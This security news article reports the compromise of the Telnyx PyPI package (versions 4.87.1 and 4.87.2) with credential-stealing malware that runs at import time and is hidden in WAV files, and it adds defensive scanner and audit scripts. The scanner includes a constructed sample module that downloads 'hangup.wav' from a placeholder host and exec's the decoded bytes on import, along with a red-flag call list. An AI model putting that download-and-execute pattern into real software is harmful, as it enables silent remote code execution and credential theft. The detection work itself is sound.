
A new supply chain attack has been identified in which the threat group TeamPCP compromised the official Telnyx Python package on the Python Package Index (PyPI), distributing malicious versions designed to steal sensitive data. The affected versions, 4.87.1 and 4.87.2, were published on March 27, 2026, and have since been quarantined after the discovery of embedded malware.
The malicious code was inserted into the package’s core file and runs automatically as soon as an application imports the library. Unlike attacks that rely on installation scripts, this method executes the malware silently at runtime, as part of the application’s normal import sequence, which makes it harder to detect. The compromised package targets multiple operating systems, including Windows, Linux, and macOS.
A notable aspect of the attack is the use of audio steganography to conceal the malicious payload. Instead of delivering a conventional executable, the attackers hid the malware within .WAV audio files downloaded from a command-and-control server. These files appear legitimate but contain encoded scripts that extract and execute credential-harvesting programs, enabling attackers to evade standard security detection mechanisms.
On Windows systems, the malware downloads a file named “hangup.wav,” extracts an executable, and places it in the system’s startup directory to ensure persistence across reboots. On Linux and macOS systems, a similar process is used with a different audio file, leading to the execution of a multi-stage attack that collects credentials and exfiltrates them to a remote server in encrypted form.
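The defensive counterpart to the import-time trigger described above is to look for calls that execute at module import time rather than inside a function. The following scanner is an added example, not code from the article or from the Telnyx project: it parses a module with Python's `ast`, treats function and lambda bodies as deferred, and flags a small, assumed list of red-flag calls (download, decode, exec, subprocess) that run on import. The two sample modules are constructed for the example; the hostname `example.invalid` and the file names are placeholders.

```python
import ast
import os
from dataclasses import dataclass

# Calls that are a red flag when they run at module import time. This list is an
# assumption for the example; tune it for your own code base. The same calls inside
# a function body are deferred until the function is called and are not flagged.
IMPORT_TIME_RED_FLAGS = {
    "exec", "eval", "compile", "__import__",
    "base64.b64decode", "zlib.decompress", "marshal.loads",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.popen",
    "urllib.request.urlopen", "requests.get", "socket.socket",
}


@dataclass
class Finding:
    filename: str
    lineno: int
    call: str


def _dotted_name(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class ImportTimeScanner(ast.NodeVisitor):
    """Walks a module AST and records red-flag calls that execute on import."""

    def __init__(self, filename):
        self.filename = filename
        self.findings = []
        self.deferred = 0  # > 0 while inside a function or lambda body

    def _visit_deferred_body(self, body):
        self.deferred += 1
        for node in body:
            self.visit(node)
        self.deferred -= 1

    def visit_FunctionDef(self, node):
        # Decorators and default argument values are evaluated at import time;
        # the body is not, so only the body is treated as deferred.
        for dec in node.decorator_list:
            self.visit(dec)
        self.visit(node.args)
        self._visit_deferred_body(node.body)

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Lambda(self, node):
        self.visit(node.args)
        self._visit_deferred_body([node.body])

    def visit_Call(self, node):
        name = _dotted_name(node.func)
        if self.deferred == 0 and name in IMPORT_TIME_RED_FLAGS:
            self.findings.append(Finding(self.filename, node.lineno, name))
        self.generic_visit(node)


def scan_source(source, filename="<string>"):
    """Scan one module's source text; returns a list of Finding."""
    scanner = ImportTimeScanner(filename)
    scanner.visit(ast.parse(source, filename))
    return scanner.findings


def scan_tree(root):
    """Scan every .py file under a directory, e.g. an installed package in site-packages."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), path))
    return findings


# Constructed sample modules (not Telnyx code). The first does its network I/O
# inside a function; the second downloads and executes something on import.
BENIGN_SAMPLE = '''
import urllib.request

def fetch(url):
    return urllib.request.urlopen(url).read()

class Client:
    def call(self):
        return fetch("https://example.invalid/api")
'''

SUSPICIOUS_SAMPLE = '''
import base64, urllib.request

def _noise():
    pass

try:
    _blob = urllib.request.urlopen("http://example.invalid/hangup.wav").read()
    exec(base64.b64decode(_blob))
except Exception:
    pass
'''

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for f in scan_tree(root):
        print(f"{f.filename}:{f.lineno}: import-time call to {f.call}")
```

Run it against the directory of an installed package (`python scan.py /path/to/site-packages/telnyx`) before trusting a fresh install; a module that reaches the network or calls `exec` at import time, with the whole thing wrapped in a bare `try/except` that hides failures, is the pattern to escalate. Static scanning of this kind is a cheap first filter, not a substitute for pinning versions and verifying what you install.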
The credential harvesting component is designed to capture a wide range of sensitive information, including SSH keys, cloud credentials, API tokens, environment variables, and even cryptocurrency wallet data. In some cases, the malware can also exploit cloud services and perform lateral movement within Kubernetes environments, significantly increasing the potential impact of the breach.
Security researchers believe the compromise may be linked to previously stolen publishing credentials, possibly obtained through earlier attacks in the same campaign targeting developer tools and CI/CD pipelines. The incident is part of a broader, ongoing operation by TeamPCP that has affected multiple widely used software packages.
Developers are strongly advised to audit their environments for the affected versions, downgrade to a safe release, rotate all credentials, and block known malicious domains associated with the attack. The incident highlights growing risks in software supply chains, especially as attackers increasingly target widely used open-source components to infiltrate enterprise systems.
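A concrete way to carry out the audit step above is to check every environment, lock file and CI log for the two affected versions and to refuse them in a pip constraints file. The script below is an added example, not the article's or the project's own tooling; the affected versions 4.87.1 and 4.87.2 come from the report, the `pip freeze` and `requirements.txt` samples are constructed, and the version 4.80.0 in the sample is a placeholder for an unaffected pin, not a statement about which release is safe.

```python
import re
from importlib import metadata

# Affected package and versions as stated in the report.
AFFECTED = {"telnyx": {"4.87.1", "4.87.2"}}


def normalize(name):
    """PEP 503 normalisation so 'Telnyx', 'telnyx' and 'TELNYX' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_affected(installed):
    """installed: iterable of (name, version) pairs; returns those that match AFFECTED."""
    hits = []
    for name, version in installed:
        if version in AFFECTED.get(normalize(name), set()):
            hits.append((name, version))
    return hits


def installed_distributions():
    """(name, version) for every distribution visible to the running interpreter."""
    return [(dist.metadata["Name"], dist.version) for dist in metadata.distributions()]


def parse_freeze(text):
    """Parse `pip freeze` output (name==version lines), e.g. captured from a CI log."""
    pairs = []
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)==([^\s;#]+)", line)
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def check_requirements(text):
    """Return (lineno, line) for exact pins in a requirements file that name an affected version."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][0-9A-Za-z.]*)$", line)
        if m and m.group(2) in AFFECTED.get(normalize(m.group(1)), set()):
            hits.append((lineno, line))
    return hits


def exclusion_constraints():
    """Lines for a pip constraints file that reject the malicious versions outright."""
    return [name + ",".join(f"!={v}" for v in sorted(versions))
            for name, versions in sorted(AFFECTED.items())]


# Constructed samples for the example; not real project files.
FREEZE_SAMPLE = "telnyx==4.87.1\nsix==1.16.0\n"

REQUIREMENTS_SAMPLE = """\
requests==2.32.3
telnyx==4.87.2   # constructed pin
Telnyx == 4.80.0
"""

if __name__ == "__main__":
    for name, version in find_affected(installed_distributions()):
        print(f"AFFECTED: {name} {version} is installed in this environment")
    for lineno, line in check_requirements(REQUIREMENTS_SAMPLE):
        print(f"requirements sample line {lineno}: {line}")
    print("constraints.txt:")
    print("\n".join(exclusion_constraints()))
```

Write the output of `exclusion_constraints()` to a `constraints.txt` and install with `pip install -c constraints.txt -r requirements.txt`, so that a resolver can never select the quarantined versions even if a transitive dependency asks for them. Finding an affected version installed is the trigger for the rest of the advice in the report: treat every credential that environment could reach (SSH keys, cloud and API tokens, environment variables) as exposed and rotate it, rather than only removing the package.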